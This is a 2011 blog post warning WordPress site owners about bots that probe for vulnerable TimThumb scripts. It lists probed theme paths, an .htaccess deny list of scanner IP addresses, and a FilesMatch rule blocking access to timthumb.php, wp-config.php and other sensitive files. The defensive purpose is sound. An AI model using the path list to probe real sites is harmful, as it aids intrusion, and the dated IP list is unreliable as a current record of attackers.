Security Alert: WordPress Timthumb Hacker on the Prowl

As most WordPress bloggers and site owners and administrators will already be aware, the TimThumb script that is popularly used for resizing images to create thumbnails for WordPress themes and plugins has a security vulnerability that allows hackers an easy ride into websites.

The vulnerability was made public at the beginning of August and was patched almost as soon as it was announced. However, I’ve noticed a increasing number of crawls of sites I manage by scripts looking for themes and plugins that use timthumb.php. These crawls produce 404 error reports in both the plugins SEO Ultimate and Redirection because the files the bot’s hunting for do not exist on my servers. In every case, the crawler scanned the directory /wp-content/themes/ and /wp-content/plugins.

10th Nov. 2011: Please see Bootnote for the best solution.

Scanned Themes and Directories

It looks like the bots are aimlessly scanning for any theme or plugin that might contain timthumb.php (or its alias, thumb.php).

The first scans hit the following directories:

pbv_multi/scripts/timthumb.php
magazinum/scripts/timthumb.php
mypage/scripts/timthumb.php
PersonalPress2/timthumb.php
ElegantEstate/timthumb.php
zenkoreviewRD/scripts/timthumb.php
primely-theme/scripts/timthumb.php
Bold4/timthumb.php
echoes/timthumb.php
arthem-mod/scripts/timthumb.php
manifesto/scripts/timthumb.php
omni-shop/timthumb.php
versatile/timthumb.php
ArtSee/timthumb.php
Aggregate/timthumb.php
Modest/timthumb.php
Glow/timthumb.php
Quadro/timthumb.php
WhosWho/timthumb.php
Wooden/timthumb.php
StudioBlue/timthumb.php
TheSource/timthumb.php
MyResume/timthumb.php
Polished/timthumb.php
Minimal/timthumb.php
TheCorporation/timthumb.php
eVid/timthumb.php
eNews/timthumb.php
Nova/timthumb.php
AskIt/timthumb.php
OnTheGo/timthumb.php
TheProfessional/timthumb.php
eStore/timthumb.php
Bold/timthumb.php
DelicateNews/timthumb.php
DeepFocus/timthumb.php
SimplePress/timthumb.php
PersonalPress/timthumb.php
nool/timthumb.php
TheStyle/timthumb.php

IP’s To Block

Place the following Apache directive into the .htaccess file in your server’s root directory. It tells your server to deny requests emanating from the stated IP addresses (updated 20th Oct. 2011):

order allow,deny
deny from 107.20.5.217
deny from 108.60.0.1
deny from 109.74.205.87
deny from 113.192.25.251
deny from 119.235.18.7
deny from 122.201.81.10
deny from 132.216.12.109
deny from 157.100.150.150
deny from 173.231.43.98
deny from 173.236.12.155
deny from 173.236.194.65
deny from 173.236.210.19
deny from 173.236.26.2
deny from 173.236.31.34
deny from 173.236.58.146
deny from 173.247.251.145
deny from 173.247.253.234
deny from 173.247.255.106
deny from 173.255.215.156
deny from 174.120.224.230
deny from 174.121.22.98
deny from 174.37.148.250
deny from 178.18.89.103
deny from 180.92.161.2
deny from 184.107.163.186
deny from 184.154.106.34
deny from 184.154.109.10
deny from 184.154.12.138
deny from 184.154.88.234
deny from 184.170.146.10
deny from 184.170.146.12
deny from 187.45.205.144
deny from 188.138.101.216
deny from 188.138.113.14
deny from 188.165.197.177
deny from 189.1.162.125
deny from 189.59.8.23
deny from 192.217.104.152
deny from 195.19.173.244
deny from 195.190.28.97
deny from 195.198.236.62
deny from 195.34.173.153
deny from 200.85.152.29
deny from 203.170.85.123
deny from 203.71.2.73
deny from 204.152.255.10
deny from 204.152.255.23
deny from 204.152.255.5
deny from 204.232.242.215
deny from 204.93.165.124
deny from 206.174.209.32
deny from 206.188.208.194
deny from 208.116.44.250
deny from 208.43.95.131
deny from 208.65.200.160
deny from 208.82.116.113
deny from 208.92.165.10
deny from 209.217.76.244
deny from 209.90.115.252
deny from 210.143.110.58
deny from 212.100.249.178
deny from 212.124.121.206
deny from 212.227.52.169
deny from 212.90.148.43
deny from 212.97.132.142
deny from 213.203.199.227
deny from 216.157.21.223
deny from 216.172.163.58
deny from 216.227.215.130
deny from 216.228.195.2
deny from 216.67.248.51
deny from 217.146.86.201
deny from 219.94.163.214
deny from 27.50.118.53
deny from 46.105.99.176
deny from 46.163.118.14
deny from 46.182.105.98
deny from 46.4.26.81
deny from 50.18.112.172
deny from 50.23.215.156
deny from 62.193.235.191
deny from 62.210.185.4
deny from 64.118.88.213
deny from 64.151.202.1
deny from 64.50.161.65
deny from 64.50.172.176
deny from 64.57.252.67
deny from 65.98.89.106
deny from 66.103.128.12
deny from 66.90.104.180
deny from 67.192.48.157
deny from 67.205.67.105
deny from 67.205.96.182
deny from 67.210.96.112
deny from 67.212.80.5
deny from 67.214.213.94
deny from 68.179.32.90
deny from 69.163.186.200
deny from 69.167.135.119
deny from 69.174.53.88
deny from 69.20.9.79
deny from 69.25.109.177
deny from 69.50.193.168
deny from 69.64.69.113
deny from 69.73.154.97
deny from 70.33.254.92
deny from 70.86.16.74
deny from 71.8.242.4
deny from 72.232.240.70
deny from 72.32.11.21
deny from 72.51.46.77
deny from 74.208.144.19
deny from 74.209.214.7
deny from 74.63.243.194
deny from 74.63.243.194
deny from 75.146.178.52
deny from 76.100.161.249
deny from 77.221.130.44
deny from 77.232.91.201
deny from 78.111.81.242
deny from 78.129.226.96
deny from 78.136.29.89
deny from 79.170.192.52
deny from 79.200.4.226
deny from 80.86.184.50
deny from 80.90.198.194
deny from 81.169.142.131
deny from 81.169.167.190
deny from 81.196.196.141
deny from 81.30.152.53
deny from 81.30.65.78
deny from 82.165.154.71
deny from 82.206.126.166
deny from 82.25.208.111
deny from 82.79.171.134
deny from 83.103.119.239
deny from 83.246.67.55
deny from 83.255.89.137
deny from 85.17.182.195
deny from 85.214.115.197
deny from 85.214.137.104
deny from 86.111.247.16
deny from 87.237.213.212
deny from 87.98.254.234
deny from 88.151.241.51
deny from 88.151.241.51
deny from 88.151.65.162
deny from 88.198.144.210
deny from 88.208.234.133
deny from 88.212.146.235
deny from 89.145.121.100
deny from 89.145.121.101
deny from 89.149.202.94
deny from 89.161.143.111
deny from 89.174.234.147
deny from 89.234.3.28
deny from 91.121.14.107
deny from 91.121.151.69
deny from 91.121.175.169
deny from 91.121.184.160
deny from 91.212.12.60
deny from 91.217.56.93
deny from 91.217.56.93
deny from 92.243.8.135
deny from 93.114.41.80
deny from 94.136.92.101
deny from 94.198.160.91
deny from 94.229.76.221
deny from 94.229.79.69
deny from 94.23.209.161
deny from 94.23.215.208
deny from 94.23.6.59
deny from 94.236.125.213
deny from 95.131.66.39
allow from all

The following IP addresses have been removed from the above list in response to host and webmaster replies to my alerting them that their servers have been hacked.

deny from 69.175.60.114

Security Recommendations

Delete any themes and plugins that you no longer use and keep WordPress, all installed themes and all installed plugins up-to-date.

There is a plugin available to scan your WordPress wp-content directory for unpatched versions of TimThumb. Grab it from wordpress.org.

Block public access to timthumb.php (and thumb.php) with an .htaccess FilesMatch directive. Copy and paste this line into your topmost .htaccess file:

<FilesMatch "^(wp-config\.php|install\.php|php\.ini|php5\.ini|readme\.html|bb-config\.php|\.htaccess|readme\.txt|timthumb\.php|thumb\.php|error_log|error\.log)">
 Deny from all
</FilesMatch>

The caret, ^, tells Apache to look for requests to view files that “start with…”, the parentheses, (), tell Apache to expect a list of files in the directive, the backslash before every full-stop tells Apache to treat the full-stop as a literal character (as opposed to a representation of any character), and the pipe, |, is used to separate list items with an “OR” preposition.

The above instruction tells Apache to block any request to view wp-config.php, install.php, php.ini, readme.html,bb-config.php, .htaccess, readme.txt, timthumb.php, thumb.php, error_log and error.log.

Using the above snippet in .htaccess  will prevent anyone but Apache (and anyone running as the Apache user/usergroup) from viewing any of the stated files. This means bots can’t view them, surfers can’t use them and you may only view them while logged into your server and using its own file browser or an FTP program.

Once added, you will notice that most attempts to find timthumb.php will cease after the first occurrence because of the “You do not have permission to view this file” or “Forbidden” message that Apache displays.

Bootnote

I found a better solution to blocking IP addresses and bad hosts.

.htaccess rewrite rules can be used to block many RFI, XSS and SQL Injection attacks.

Read WordPress Security Hardening Tips here.

What Next?

When possible, I contact website owners and their hosts (if the site owner fails to respond) to alert them to malicious scripts on their servers. Maybe you could do similar to help free the Net of malicious bots.

Suggestions for removing and updating TimThumb are given at WP Service Masters.

If do think you’ve been hacked then you should backup and download your wp-content directory, any files and directories you’ve created, and your database before deleting everything and re-installing WordPress. A good guide to this is found at WP Service Masters.

Sharing is caring!

Subscribe
Notify of
guest

This site uses Akismet to reduce spam. Learn how your comment data is processed.

20 Comments
Oldest
Newest Most Voted
Inline Feedbacks
View all comments
20
0
Would love your thoughts, please comment.x
()
x